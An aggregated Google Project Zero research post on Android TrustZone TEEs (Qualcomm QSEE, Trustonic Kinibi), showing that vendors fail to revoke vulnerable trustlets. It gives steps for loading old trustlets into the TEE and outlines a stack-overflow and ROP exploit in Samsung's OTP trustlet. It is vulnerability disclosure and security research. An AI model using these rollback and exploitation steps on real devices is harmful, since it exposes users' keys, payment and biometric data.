Feed aggregator

Building a Software Defined Cloud with Power Systems

IBM Redbooks Site - Tue, 07/25/2017 - 09:30
Draft Redpaper, last updated: Tue, 25 Jul 2017

The aim of this document is to provide the reader with a concrete example and implementation details for building out a fully software defined cloud on Power Systems.

Categories: Technology

Trust Issues: Exploiting TrustZone TEEs

Google Project Zero - Mon, 07/24/2017 - 12:39
Posted by Gal Beniamini, Project Zero
Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process a wide range of personal and private information of a sensitive nature, such as biometric identifiers, payment data and cryptographic keys. Additionally, modern content protection schemes demand a high degree of confidentiality, requiring stricter guarantees than those offered by the “regular” operating system.
In response to these use-cases and more, mobile device manufacturers have opted for the creation of a “Trusted Execution Environment” (TEE), which can be used to safeguard the information processed within it. In the Android ecosystem, two major TEE implementations exist - Qualcomm’s QSEE and Trustonic’s Kinibi (formerly <t-base). Both of these implementations rely on ARM TrustZone security extensions in order to facilitate a small “secure” operating system, within which “Trusted Applications” (TAs) may be executed.
In this blog post we’ll explore the security properties of the two major TEEs present on Android devices. We’ll see how, despite their highly sensitive vantage point, these operating systems currently lag behind modern operating systems in terms of security mitigations and practices. Additionally, we’ll discover and exploit a major design issue which affects the security of most devices utilising both platforms. Lastly, we’ll see why the integrity of TEEs is crucial to the overall security of the device, making a case for the need to increase their defences.
Unfortunately, the design issue outlined in this blog post is difficult to address, and at times cannot be fixed without introducing additional dedicated hardware or performing operations that risk rendering devices unusable. As a result, most Qualcomm-based devices and all devices using Trustonic’s Kinibi TEE versions prior to 400 (that is, all Samsung Exynos devices other than the Galaxy S8 and S8 Plus) remain affected by this issue. We hope that by raising awareness of this issue we will help push for more secure designs in the future.
I would like to note that while the current designs being reviewed may be incompatible with some devices’ use-cases, improved designs are being developed as a result of this research which may be accessible to a larger proportion of devices.

TrustZone TEEs
TrustZone forms a hardware-based security architecture which provides security mechanisms both on the main application processor, as well as across the SoC. TrustZone facilitates the creation of two security contexts; the “Secure World” and the “Normal World”. Each physical processor is split into two virtual processors, one for each of the aforementioned contexts.
As its name implies, the “Secure World” must remain protected against any attacks launched by the “Normal World”. To do so, several security policies are enforced by hardware logic that prevents the “Normal World” from accessing the “Secure World”’s resources. What’s more, as the current security state is accessible on the system bus, peripherals on the SoC can be designated to either world by simply sampling this value.
TrustZone’s software model provides each world with its own copies of both lower privilege levels -- EL0 and EL1. This allows for the execution of different operating system kernels simultaneously - one running in the “Secure World” (S-EL1), while another runs in the “Normal World” (EL1). However, the world-split is not entirely symmetrical; for example, the hypervisor extensions (EL2) are not available in the “Secure World”.
*TOS: Trusted Operating System
On Android devices, TrustZone technology is used among other things to implement small “security-conscious” operating systems within which a set of trusted applications (TAs) may be executed. These TrustZone-based TEEs are proprietary components and are provided by the device’s manufacturers.
To put it in context - what we normally refer to as “Android” in our day to day lives is merely the code running in the “Normal World”; the Linux Kernel running at EL1 and the user-mode applications running at EL0. At the same time, the TEE runs in the “Secure World”; the TEE OS runs in the “Secure World”’s EL1 (S-EL1), whereas trusted applications run under S-EL0.
Within the Android ecosystem, two major TEE implementations exist; Qualcomm’s “QSEE” and Trustonic’s “Kinibi”. These operating systems run alongside Android and provide several key features to it. These features include access to biometric sensors, hardware-bound cryptographic operations, a “trusted user-interface” and much more.
Since the “Secure World”’s implementation is closely tied to the hardware of the device and the available security mechanisms on the SoC, the TEE OSs require support from and integration with the earlier parts of the device’s bootchain, as well as low-level components such as the bootloader.
Lastly, as can be seen in the schematic above, in order for the “Normal World” to be able to interact with the TEE and the applications within it, the authors of the TEE must also provide user-libraries, daemons and kernel drivers for the “Normal World”. These components are then utilised by the “Normal World” in order to communicate with the TEE.

Exploring the TEEs
Like any other operating system, the security of a Trusted Execution Environment hinges on the integrity of both its trusted applications and that of the TEE OS’s kernel itself. The interaction with the TEE’s kernel is mostly performed by the trusted applications running under it. As such, the logical first step to assessing the security of the TEEs would be to get a foothold within the TEE itself.
To do so, we’ll need to find a vulnerability in a trusted application and exploit it to gain code execution. While this may sound like a daunting task, remember that trusted applications are merely pieces of software that process user-supplied data. These applications aren’t written in memory-safe languages, and are executed within opaque environments - a property which usually doesn’t lend itself well to security.
Bearing all this in mind, how can we start analysing the trusted applications in either of these platforms? Recall that the implementations are proprietary, so even the file formats used to store the applications may not be public.
Indeed, in Qualcomm’s case the format used to store the applications was not documented until recently. Nonetheless, some attempts have been made to reverse engineer the format resulting in tools that allow converting the proprietary file format into a regular ELF file. Once an ELF file is produced, it can subsequently be analysed using any run-of-the-mill disassembler. What’s more, in a recent positive trend of increased transparency, Qualcomm has released official documentation detailing the file format in its entirety, allowing more robust research tools to be written as a result.
As for Trustonic, the trusted applications’ loadable format is documented within Trustonic’s publicly available header files. This saves us quite some hassle. Additionally, some plugins are available to help load these applications into popular disassemblers such as IDA.

Now that we’ve acquired the tools needed to inspect the trusted applications, we can proceed on to the next step - acquiring the trustlet images (from a firmware image or from the device), converting them to a standard format, and loading them up in a disassembler.
However, before we do so, let’s take a moment to reflect on the trustlet model!

Revisiting the Trustlet Model
To allow for increased flexibility, modern TEEs are designed to be modular, rather than monolithic chunks of code. Each TEE is designed as a “general-purpose” operating system, capable of loading arbitrary trustlets (conforming to some specification) and executing them within a “trusted environment”.  What we refer to as a TEE is the combination of the TEE’s operating system, as well as the applications running within it.
There are many advantages to this model. For starters, changes to a single trustlet only require updating the application’s binary on the filesystem, without necessitating any change in other components of the TEE. This also allows for the creation of a privilege separation model, providing certain privileges to some trustlets while denying them to others. Perhaps most importantly, this enables the TEE OS to enforce isolation between the trustlets themselves, thus limiting the potential damage done by a single malicious (or compromised) trustlet. Of course, while in principle these advantages are substantial, we’ll see later on how they actually map onto the TEEs in question.
Regardless, while the advantages of this model are quite clear, they are not completely free of charge. Recall, as we’ve mentioned above, that trusted applications are not invulnerable. Once vulnerabilities are found in these applications, they can be used to gain code execution within the TEE (in fact, we’ll write such an exploit later on!).
However, this begs the question - “How can trustlets be revoked once they’ve been found to be vulnerable?”. After all, simply fixing a vulnerability in a trustlet would be pointless if an attacker could load old vulnerable trustlets just as easily.
To answer this question, we’ll have to separately explore each TEE implementation.

QSEE Revocation
As we’ve mentioned above, Qualcomm has recently released (excellent) documentation detailing the secure boot sequence on Qualcomm devices, including the mechanisms used for image authentication. As trusted applications running under QSEE are part of the same general architecture described in this document, we may gain key insights into the revocation process by reviewing the document.
Indeed, Qualcomm’s signed images are regular ELF files which are supplemented by a single special “Hash Table Segment”. This segment includes three distinct components: the SHA-256 digest of each ELF segment, a signature blob, and a certificate chain.


The signature is computed over the concatenated blob of SHA-256 hashes, using the private key corresponding to the last certificate in the embedded certificate chain. Moreover, the root certificate in the chain is validated against a “Root Key Hash” which is stored in the device’s ROM or fused into one-time-programmable memory on the SoC.
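As a rough illustration of the scheme described above, the following Python sketch computes the blob the signature covers and performs the root-key check. The helper names are hypothetical, and the exact bytes covered by the “Root Key Hash” (here, the whole root certificate) are an assumption:

```python
import hashlib

def hash_table_digest(segments):
    """Concatenate the SHA-256 digest of each ELF segment, mirroring the
    hash table segment; the signature is computed over this blob."""
    return b"".join(hashlib.sha256(seg).digest() for seg in segments)

def root_key_matches(root_cert_der, fused_root_key_hash):
    """Compare the chain's root certificate against the hash stored in
    ROM or fused into one-time-programmable memory (both byte strings)."""
    return hashlib.sha256(root_cert_der).digest() == fused_root_key_hash
```

Verifying the actual signature over the digest blob would then proceed using the public key from the last certificate in the embedded chain.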
Reading through the document, we quickly come across the following relevant statement:
“The Attestation certificate used to verify the signature on this hash segment also includes additional fields that can bind restrictions to the signature (preventing “rolling back” to older versions of the software image, …”
Ah-ha! Well, let’s keep reading and see if we come across more pertinent information regarding the field in question.
Continuing our review of the document, it appears that Qualcomm has elected to add unique OU fields to the certificates in the embedded chain, denoting several attributes relating to the signature algorithm of the image being loaded. One such field of particular interest to our pursuits is the “SW_ID”. According to the document, this field is used to “bind the signature to a particular version of a particular software image”. Interesting!
The field comprises two concatenated values: an image identifier (IMAGE_ID) and a version counter.

The document then goes on to explain:
“...If eFuse values indicated that the current version was ‘1’, then this image would fail verification. Version enforcement is done in order to prevent loading an older, perhaps vulnerable, version of the image that has a valid signature attached.”
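Based on the description, here is a minimal sketch of the split. Treating SW_ID as a 64-bit value with the version counter in the upper 32 bits and the image identifier in the lower 32 is our reading of the document, not a documented fact in this post:

```python
def parse_sw_id(sw_id: int):
    """Split a 64-bit SW_ID into (version, image_id).
    The upper-32/lower-32 layout is an assumption."""
    version = (sw_id >> 32) & 0xFFFFFFFF
    image_id = sw_id & 0xFFFFFFFF
    return version, image_id
```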
At this point we have all the information we need. It appears that the subject of image revocation has not eluded Qualcomm -- we’re already off to a good start. However, there are a few more questions in need of an answer yet!
Let’s start by taking a single trustlet, say the Pixel’s Widevine trustlet, and inspecting the value of the SW_ID field encoded in its attestation certificate. As this is a DER-encoded X.509 certificate, we can parse it using “openssl”:

As we can see above, the IMAGE_ID value assigned to the Widevine trustlet is 0xC. But what about the other trustlets in the Pixel’s firmware? Inspecting them reveals a surprising fact -- all trustlets share the same image identifier.
More importantly, however, it appears that the version counter in the Widevine application on the Pixel is 0. Does this mean that no vulnerabilities or other security-relevant issues have been found in that trustlet since the device first shipped? That seems like a bit of a stretch. In order to get a better view of the current state of affairs, we need a little more data.
Luckily, I have a collection of firmware images that can be used for this exact purpose! The collection contains more than 45 different firmware images from many different vendors, including Google, Samsung, LG and Motorola. To collect the needed data, we can simply write a short script to extract the version counter from every trustlet in every firmware image. Running this script on the firmware collection would allow us to assess how many devices have used the trustlet revocation feature in the past to revoke any vulnerable trusted application (since their version counter would have to be larger than zero).
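The script itself boils down to something like the following sketch. The SW_ID values are assumed to have already been extracted from each trustlet’s attestation certificate (e.g., with openssl), and the version-in-the-upper-32-bits layout is an assumption:

```python
from collections import Counter

def revocation_summary(sw_ids_by_firmware):
    """Given {firmware_name: [sw_id, ...]}, count how many firmware
    images contain at least one trustlet with a non-zero version
    counter -- i.e., images that have ever revoked a trustlet."""
    revoked = [fw for fw, ids in sw_ids_by_firmware.items()
               if any((sw_id >> 32) != 0 for sw_id in ids)]
    return Counter(revoked=len(revoked), total=len(sw_ids_by_firmware))
```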
After running the script on my firmware collection, we are greeted with a surprising result: with the exception of a single firmware image, all trustlets in all firmware images contain version number 0.
Putting it all together, this would imply one of two things: either no bugs are ever found in any trustlet, or device manufacturers are failing to revoke vulnerable trustlets.
In fact, we already know the answer to this question. Last year I performed research into the Widevine trustlet as present on the Nexus 6 and found (and exploited) a vulnerability allowing arbitrary code execution within the TEE.
This same vulnerability was also present on a wide variety of other devices from different manufacturers, some of which are also a part of my firmware collection. Nonetheless, none of these devices in my collection (including the Nexus 6) revoked the vulnerable trustlet, and as such they have remained vulnerable to this issue. While some devices (such as the Nexus 6) have shipped patched versions of the trustlet, simply providing a patched version without incrementing the version counter has no effect whatsoever.
While I do not have a sufficiently large firmware collection to perform a more in-depth analysis, previous assessments have been done regarding the number of affected devices. Regardless, it remains unknown what proportion of these devices have correctly revoked the trustlet.
As it happens, exploiting the issue on “patched” devices is extremely straightforward, and does not require any more privileges than those required by the original version of the exploit. All an attacker would need to do is to place the old trustlet anywhere on the filesystem, and change the path of the trustlet in the exploit (a single string) to point at that new location (you can find an example of such an exploit here).
One might be tempted to suggest several stop-gap mitigations, such as filtering the filesystem path from which trustlets are loaded to ensure that they only originate from the system partition (thus raising the bar for a would-be attacker). However, due to the design of the API used to load trustlets, such filtering is not feasible. This is because QSEECOM, the driver provided by Qualcomm to interact with QSEE, exposes a simple API in which user-space merely hands it a buffer containing the trustlet’s binary. This buffer is then passed on to TrustZone in order for the trustlet to be authenticated and subsequently loaded. Since the driver only receives a blob containing the trustlet itself, it has no “knowledge” of the filesystem path on which the trustlet is stored, making any such path-based verification infeasible.
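To illustrate the point, here is a rough ctypes mirror of the load request handed to the driver. The field names and sizes approximate those in Qualcomm’s public kernel sources but should be treated as illustrative; the point is what’s missing - any notion of a filesystem path the kernel could validate:

```python
import ctypes

MAX_APP_NAME_SIZE = 64  # illustrative constant

class QseecomLoadImgReq(ctypes.Structure):
    # Approximation of the QSEECOM load-image ioctl argument: the kernel
    # only sees a memory region holding the trustlet binary plus a
    # display name -- there is no path field it could filter on.
    _fields_ = [
        ("mdt_len", ctypes.c_uint32),    # length of the metadata blob
        ("img_len", ctypes.c_uint32),    # length of the full image
        ("ifd_data_fd", ctypes.c_int32), # fd of the buffer holding the binary
        ("img_name", ctypes.c_char * MAX_APP_NAME_SIZE),
    ]

field_names = [name for name, _ in QseecomLoadImgReq._fields_]
```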
Of course, interaction with QSEECOM is restricted to several SELinux contexts. However, a non-exhaustive list of these includes the media server, DRM server, KeyStore, volume daemon, fingerprint daemon and more. Not a short list by any stretch…
So what about devices unaffected by the previously disclosed Widevine vulnerability? It is entirely possible that these devices are affected by other bugs; either still undiscovered, or simply not public. It would certainly be surprising if no bugs whatsoever have been found in any of the trustlets on these devices in the interim.
For example, diffing two versions of the Widevine trustlet in the Nexus 6P shows several modifications, including changes in functions related to key verification. Investigating these changes, however, would require a more in-depth analysis of Widevine and is beyond the scope of this blog post.


Putting all of the above together, it seems quite clear that device manufacturers are either unaware of the revocation features provided by Qualcomm, or are unable to use them for one reason or another.
In addition to the mechanism described above, further capabilities are available for trustlet revocation. Specifically, on devices where a replay protected memory block (RPMB) is available, it can be utilised to store the version numbers for trustlets, instead of relying on an eFuse. In this scenario, the APP_ID OU field is used to uniquely identify each trusted application, allowing for more fine-grained control over their revocation.
That being said, in order to leverage this feature, devices must be configured with a specific eFuse blown. Since we cannot easily query the status of eFuses on a large scale, it remains unknown what proportion of devices have indeed enabled this feature. Perhaps one explanation for the lack of revocation is that some devices either lack an RPMB, or have not blown the aforementioned eFuse in advance (blowing a fuse on a production device may be a risky operation).
What’s more, going over our firmware collection, it appears that some manufacturers have an incomplete understanding of the revocation feature. This is evidenced by the fact that several firmware images use the same APP_ID for many (and sometimes all) trusted applications, thus preventing the use of fine-grained revocation.
There are other challenges as well - for example, some vendors (such as Google) ship their devices with an unlocked bootloader. This allows users to freely load any firmware version onto the device and use it as they please. However, revoking trustlets would strip users of the ability to flash any firmware version, as once a trustlet is revoked, firmware versions containing trustlets from the previous versions would no longer pass the authentication (and would therefore fail to load). As of now, it seems that there is no good solution for this situation. Indeed, all Nexus and Pixel devices are shipped with an unlocked bootloader, and are therefore unable to make use of the trustlet revocation feature as present today.
One might be tempted once again to suggest naive solutions, such as embedding a whitelist of “allowed” trustlet hashes in the TEE OS’s kernel itself. Thus, when trustlets are loaded, they may also be verified against this list to ensure they are allowed by the current version of the TEE OS. This suggestion is not meritless, but is not robust either. For starters, it would require incrementing the version counter for the TEE OS’s image (otherwise attackers may roll back that binary as well). Therefore, this method suffers from some of the same drawbacks as the currently used approach (for starters, devices with an unlocked bootloader would be unable to utilise it). It should be noted, however, that rewriting the TEE OS’s image would generally require raw access to the filesystem, which is strictly more restrictive than the current permissions needed to carry out the attack.
Nonetheless, a better solution to this problem (rather than a stop-gap mitigation) is still needed. We hope that by underscoring all of these issues plaguing the current implementation of the revocation feature (leading to it being virtually unused for trustlet revocation), the conversation will shift towards alternate models of revocation that are more readily available to manufacturers. We also hope that device manufacturers that are able to use this feature, will be motivated to do so in the future.
Kinibi Revocation
Now, let’s set our sights on Trustonic’s Kinibi TEE. In our analysis, we’ll use the Samsung Galaxy S7 Edge (SM-G935F) - this is an Exynos-based device running Trustonic’s TEE version 310B. As we’ve already disclosed an Android privilege escalation vulnerability a few months ago, we can use that vulnerability in order to get elevated code execution within the “system_server” process on Android. This allows us greater freedom in exploring the mechanisms used in the “Normal World” related to Trustonic’s TEE.
Unfortunately, unlike Qualcomm, no documentation is available for the image authentication process carried out by Trustonic’s TEE. Be that as it may, we can still start our research by inspecting the trustlet images themselves. If we can account for every single piece of data stored in the trustlet binary, we should be able to identify the location of any version counter (assuming, of course, such a counter exists).
As we’ve mentioned before, the format used by trusted applications in Trustonic’s TEE is documented in their public header files. In fact, the format itself is called the “MobiCore Loadable Format” (MCLF), and harkens back to G&D’s MobiCore TEE, from which Trustonic’s TEE has evolved.
Using the header files and inspecting the binary in tandem, we can piece together the entire format used to store the trustlet’s metadata as well as its code and data segments. As a result, we arrive at the following layout:

At this point, we have accounted for all but a single blob in the trustlet’s binary - indeed, as shown in the image above, following the data segment, there appears to be an opaque blob of some sort. It would stand to reason that this blob would represent the trustlet’s signature (as otherwise that would imply that unsigned trusted applications could be loaded into the TEE). However, since we’d like to make sure that all bits are accounted for, we’ll need to dig deeper and make sure that is the case.
Unfortunately, there appear to be no references in the header files to a blob of this kind. With that in mind, how can we make sure that this is indeed the trustlet’s signature? To do so we’ll need to reverse engineer the loading code within the TEE OS responsible for authenticating and loading trusted applications. Once we identify the relevant code, we should be able to isolate the handling of the signature blob and deduce its format.
At this point, however, this is easier said than done. We still have no knowledge of where the TEE OS’s binary is stored, how it may be extracted, and what code is responsible for loading it into place. However, some related work has been done in the past. Specifically, Fernand Lone Sang of Quarkslab has published a two-part article on reverse-engineering Samsung’s SBOOT on the Galaxy S6. While his work is focused on analysing the code running in EL3 (which is based on ARM’s Trusted Firmware), we’re interested in dissecting the code running in S-EL1 (namely, the TEE OS).
By applying the same methodology described by Fernand, we can load the SBOOT binary from an extracted firmware image into IDA and begin analysing it. Since SBOOT is based on ARM’s Trusted Firmware architecture, all we’d need to do is follow the logic up to the point at which the TEE OS is loaded by the bootloader. This component is also referred to as “BL32” in the ARM Trusted Firmware terminology.

After reversing the relevant code flows, we finally find the location of the TEE OS’s kernel binary embedded within the SBOOT image! In the interest of brevity, we won’t include the entire process here. However, anyone wishing to extract the binary for themselves and analyse it can simply search for the string “VERSION_-+A0”, which denotes the beginning of the TEE OS’s kernel image. As for the image’s base address - by inspecting the absolute branches and the address of the VBAR in the kernel we can deduce that it is loaded into virtual address 0x7F00000.
Alternatively, there exists another (perhaps much easier) way to inspect Kinibi’s kernel. It is a well-known fact that Qualcomm supports the execution of not one, but two TEEs simultaneously. Samsung devices based on Qualcomm’s SoCs make use of this feature by loading both QSEE and Kinibi at the same time. This allows Samsung to access features from both TEEs on the same device. However, we’ve already seen how images loaded by Qualcomm’s image authentication module can be converted into regular ELF files (and subsequently analysed). Therefore, we can simply apply the same process to convert Kinibi’s kernel (“tbase”, as present on Samsung’s Qualcomm-based devices) into an ELF file which can then be readily analysed.
Since the file format of trusted applications running under the Kinibi TEE on Qualcomm devices appears identical to the one used on Exynos devices, this suggests that whatever authentication code is present in one is also present in the other.
After some reversing, we identify the relevant logic responsible for authenticating trusted applications being loaded into Kinibi. The microkernel first verifies the arguments in the MCLF header, such as its “magic” value (“MCLF”). Next, it inspects the “service type” of the image being loaded. By following the code’s flow we arrive at the function used to authenticate both system trustlets and drivers - just what we’re after! After analysing this function’s logic, we finally arrive at the structure of the signature blob:

The function extracts the public key information (the modulus and the public exponent). Then, it calculates the SHA-256 digest of the public key and ensures that it matches the public key hash embedded in the kernel’s binary. If so, it uses the extracted public key together with the embedded signature in the blob to verify the signature on the trustlet itself (which is performed on its entire contents up to the signature blob). If the verification succeeds, the trustlet is loaded.
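The flow above can be sketched in Python. This is purely a flow illustration using textbook RSA with tiny toy parameters - the real implementation uses proper RSA with padding, and the exact serialization of the public key blob is an assumption:

```python
import hashlib

def verify_trustlet(blob, sig_off, modulus, exponent, trusted_key_hash):
    """Toy sketch of Kinibi's trustlet verification flow."""
    # 1. Hash the embedded public key and compare against the hash
    #    baked into the kernel binary (serialization is assumed).
    key_blob = modulus.to_bytes(8, "big") + exponent.to_bytes(4, "big")
    if hashlib.sha256(key_blob).digest() != trusted_key_hash:
        return False
    # 2. The signature covers the trustlet's entire contents up to
    #    the signature blob itself.
    signed_region = blob[:sig_off]
    digest = int.from_bytes(hashlib.sha256(signed_region).digest(), "big") % modulus
    # 3. "Verify" with textbook RSA: sig^e mod n must equal the digest.
    signature = int.from_bytes(blob[sig_off:], "big")
    return pow(signature, exponent, modulus) == digest
```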
At long last, we are finally able to account for every single bit in the trustlet. But… Something appears to be amiss - where is the version counter located? Out of the entire trustlet’s binary, there is but a single value which may serve this purpose -- the “Service Version” field in the MCLF header. However, it certainly doesn’t seem like this value is being used by the loading logic we traced just a short while ago. Nevertheless, it’s possible that we’ve simply missed some relevant code.
Regardless, we can check whether any revocation using this field is taking place in practice by leveraging our firmware collection once again! Let’s write a short script to extract the service version field from every trusted application and run it against the firmware repository…
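The core of such a script is a small MCLF header parser. The offset of the service version field below is reconstructed from Trustonic’s public mcLoadFormat headers and should be treated as an assumption:

```python
import struct

# Offset of the serviceVersion field within the MCLF v2 header,
# as reconstructed from the public headers (an assumption).
SERVICE_VERSION_OFFSET = 72

def service_version(mclf: bytes) -> int:
    """Extract the service version field from an MCLF trustlet image."""
    magic, = struct.unpack_from("<4s", mclf, 0)
    if magic != b"MCLF":
        raise ValueError("not an MCLF image")
    version, = struct.unpack_from("<I", mclf, SERVICE_VERSION_OFFSET)
    return version
```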
...And the results are in! Every single trusted application in my firmware repository appears to use the same version value - “0”. While there are some drivers that use a different value, it appears to be consistent across devices and firmware versions (and therefore doesn’t seem to represent a value used for incremental versions or for revocation). All in all, it certainly seems as though no revocation is taking place.
But that’s still not quite enough. To ensure that no revocation is performed, we’ll need to try it out for ourselves by loading a trustlet from an old firmware version into a more recent version.
To do so, we’ll need to gain some insight into the user-mode infrastructure provided by Trustonic. Let’s follow the execution flow through the process of loading a trustlet - starting at the “Normal World” and ending in the “Secure World”’s TEE. Doing so will help us figure out which user-mode components we’ll need to interact with in order to load our own trustlet.
When a privileged user-mode process wishes to load a trusted application, they do so by sending a request to a special daemon provided by Trustonic - “mcDriverDaemon”. This daemon allows clients to issue requests to the TEE (which are then routed to Trustonic’s TEE driver). One such command can be used to load a trustlet into the TEE.
The daemon may load trustlets from one of two paths - either from the system partition ("/system/app/mcRegistry"), or from the data partition ("/data/app/mcRegistry"). Since in our case we would like to avoid modifying the system partition, we will simply place our binary in the latter path (which has an SELinux context of “apk_data_file”).
While the load request itself issued to the daemon specifies the UUID of the trustlet to be loaded, the daemon only uses the UUID to locate the binary, but does not ensure that the given UUID matches the one encoded in the trustlet's header. Therefore, it’s possible to load any trustlet (regardless of UUID) by placing a binary with an arbitrary UUID (e.g., 07050501000000000000000000000020) in the data partition's registry directory, and subsequently sending a load request with the same UUID to the daemon.

Lastly, the communication with the daemon is done via a UNIX domain socket. The socket has an SELinux context which limits the number of processes that can connect to it. Nonetheless, much like in Qualcomm’s case, the list of such processes seems to include the majority of privileged processes running on the system. Indeed, a very partial list includes the DRM server, system server, the volume daemon, mediaserver and indeed any system application (you can find the full list in the issue tracker).
From then on, the daemon simply contacts Trustonic’s driver and issues a specific set of ioctls which cause it to pass on the request to the TEE. It should be noted that access to the driver is also available to quite a wide range of processes (once again, the full list can be seen in the issue tracker).
Now that we’re sufficiently informed about the loading process, we can go ahead and attempt to load an old trustlet. Let’s simply take an old version of the “fingerprint” trustlet and place it into the registry directory under the data partition. After issuing a load request to the daemon and following the dmesg output, we are greeted with the following result:

There we have it -- the trustlet has been successfully loaded into the TEE, confirming our suspicions!
After contacting Samsung regarding this issue, we’ve received the following official response:
“Latest Trustonic kinibi 400 family now supports rollback prevention feature for trustlets and this is fully supported since Galaxy S8/S8+ devices”
Indeed, it appears that the issue has been addressed in the newest version of Trustonic’s TEE - Kinibi 400. Simply searching for relevant strings in the TEE OS binary provided in the Galaxy S8’s firmware reveals some possible hints as to the underlying implementation:

Based on these strings alone, it appears that newer devices utilise a replay protected memory block (RPMB) in order to prevent old trustlets from being rolled back. As the implementation is proprietary, more research is needed in order to determine how this feature is implemented.
With regards to Samsung devices - although revocation appears to be supported in the Galaxy S8 and S8 Plus, all other Exynos-based devices remain vulnerable to this issue. In fact, in the next part we’ll write an exploit for a TEE vulnerability. As it happens, this same vulnerability is present in several different devices, including the Galaxy S7 Edge and Galaxy S6.
Without specialised hardware used to store the version counter or some other identifier which can be utilised to prevent rollback, it seems like there is not much that can be done to address the issue in older devices. Nonetheless, as we have no visibility into the actual security components on the SoC, it is not clear whether a fix is indeed not possible. Perhaps other hardware components could be co-opted to implement some form of revocation prevention. We remain hopeful that a stop-gap mitigation may be implemented in the future.

Deciding On A Target
To make matters more interesting, let’s try to identify an “old” vulnerable trustlet (one which has already been “patched” in previous versions). Once we find such a trustlet, we could simply insert it into the registry and load it into the TEE. As it happens, finding such trustlets is rather straightforward - all we have to do is compare the trustlets from the most recent firmware version against those in the first version released for a given device -- if there have been any security-relevant fixes, we should be able to track them down.
In addition, we may also be able to use vulnerable trustlets from a different device. This would succeed only if both devices share the same “trusted” public key hash embedded in the TEE OS. To investigate whether such scenarios exist, I’ve written another script which extracts the modulus from each trustlet binary and groups together firmware versions and devices that share the same signing key. After running this script, it appears that both the Galaxy S7 Edge (G935F) and the Galaxy S7 (G930F) use the same signing key. As a result, attackers can load trustlets from either device into the other (thereby expanding the list of possibly vulnerable trustlets that can be leveraged to attack the TEE).
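The grouping step the script performs can be sketched in a few lines of C. Everything here is illustrative: the digests and device names are placeholders, not real Samsung key material, and the real script works on extracted trustlet containers.

```c
#include <string.h>

/* Each trustlet container is reduced to a digest of its RSA modulus; two
 * firmware images are put in the same group when the digests match
 * byte-for-byte. */
#define DIGEST_LEN 32

struct firmware {
    const char *device;
    unsigned char key_digest[DIGEST_LEN];
};

int same_signing_key(const struct firmware *a, const struct firmware *b) {
    return memcmp(a->key_digest, b->key_digest, DIGEST_LEN) == 0;
}

/* Count how many distinct signing keys appear in a set of images; fewer
 * distinct keys than images means some devices share a key. */
int count_distinct_keys(const struct firmware *fw, int n) {
    int distinct = 0;
    for (int i = 0; i < n; i++) {
        int seen = 0;
        for (int j = 0; j < i; j++)
            if (same_signing_key(&fw[i], &fw[j])) { seen = 1; break; }
        if (!seen)
            distinct++;
    }
    return distinct;
}
```

With this grouping in hand, any pair of images sharing a key becomes a candidate for cross-device trustlet loading.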
After comparing a few trusted applications against their older versions, it is immediately evident that there’s a substantial number of security-relevant fixes. For example, a cursory comparison between the two versions of the “CCM” trustlet (FFFFFFFF000000000000000000000012) revealed four added bounds checks which appear to be security-relevant.


Alternatively, we can draw upon previous research. Last year, while doing some cursory research into the trusted applications available on Samsung’s Exynos devices, I discovered a couple of trivial vulnerabilities in the “OTP” trustlet running under that platform. These vulnerabilities have since been “fixed”, but as the trustlets are not revoked, we can still freely exploit them.
In fact, let’s do just that.Writing A Quick Exploit
We’ve already determined that old trustlets can be freely loaded into Kinibi TEE (prior to version 400). To demonstrate the severity of this issue, we’ll exploit one of two vulnerabilities I’ve discovered in the OTP trustlet late last year. Although the vulnerability has been “patched”, attackers can simply follow the steps above to load the old version of the trustlet into the TEE and exploit it freely.  
The issue we’re going to exploit is a simple stack-overflow. You might rightly assume that a stack overflow would be mitigated against by modern exploit mitigations. However, looking at the binary it appears that no such mitigation is present! As we’ll see later on, this isn’t the only mitigation currently missing from Kinibi.
Getting back to the issue at hand, let’s start by understanding the primitive at our disposal. The OTP trustlet allows users to generate OTP tokens using embedded keys that are “bound” to the TrustZone application. Like most other trusted applications, its code generally consists of a simple loop which waits for notifications from the TEE OS informing it of an incoming command.
Once a command is issued by a user in the “Normal World”, the TEE OS notifies the trusted application, which subsequently processes the incoming data using the “process_cmd” function. Reversing this function we can see the trustlet supports many different commands. Each command is assigned a 32-bit “command ID”, which is placed at the beginning of the user’s input buffer.
Following the code for these commands, it is quickly apparent that many of them use a common utility function, “otp_unwrap”, in order to take a user-provided OTP token and decrypt it using the TEE’s TrustZone-bound unwrapping mechanism.
This function receives several arguments, including the length of the buffer to be unwrapped. However, it appears that in most call-sites, the length argument is taken from a user-controlled portion of the input buffer, with no validation whatsoever. As the buffer is first copied into a stack-allocated buffer, this allows us to simply overwrite the stack frame with controlled content. To illustrate the issue, let’s take a look at the placement of items in the buffer for a valid unwrap command, versus their location on the stack when copied by “otp_unwrap”:

As we’ve mentioned, the “Token Length” field is not validated and is entirely attacker-controlled. Supplying an arbitrarily large value will therefore result in a stack overflow. All that’s left now is to decide on a stack layout with which we can overwrite the return address at the end of the stack frame and hijack the control flow. For the sake of convenience, let’s simply return directly from “otp_unwrap” to the main processing function - “process_cmd”. To do so, we’ll overwrite all the stack frames in-between the two functions.
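To make the missing check concrete, here is a minimal C sketch of the vulnerable pattern. The buffer size, function names and the one-line fix are all invented for illustration; the real trustlet is ARM code reconstructed through reversing.

```c
#include <stdint.h>
#include <string.h>

#define TOKEN_BUF_LEN 32u  /* hypothetical stack buffer size */

/* The vulnerable pattern: token_len comes straight from the attacker-
 * controlled input buffer and is never compared against the stack
 * buffer's capacity, so memcpy can run past the frame. */
int unwrap_token_vulnerable(const uint8_t *input, uint32_t token_len) {
    uint8_t token[TOKEN_BUF_LEN];
    memcpy(token, input, token_len);   /* overflows if token_len > 32 */
    return (int)token[0];              /* stand-in for the real unwrapping */
}

/* The missing validation is a single comparison. */
int unwrap_token_checked(const uint8_t *input, uint32_t token_len) {
    uint8_t token[TOKEN_BUF_LEN];
    if (token_len > sizeof(token))
        return -1;                     /* reject oversized tokens */
    memcpy(token, input, token_len);
    return (int)token[0];
}
```

Because the length is trusted verbatim, the attacker controls exactly how far past the buffer the copy runs.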
As an added bonus, this allows us to utilise the stack space available between the two stack frames for the ROP chain of our choice. Choosing to be conservative once again, we’ll elect to write a ROP chain that simply prepares the arguments for a function, executes it, and returns the return value back to “process_cmd”. That way, we gain a powerful “execute-function-in-TEE” primitive, allowing us to effectively run arbitrary code within the TEE. Any read or write operations can be delegated to read and write gadgets, respectively - allowing us to interact with the TEE’s address space. As for interactions with the TEE OS itself (such as system calls), we can directly invoke any function in the trusted application’s address space as if it were our own, using the aforementioned “execute-function” primitive.
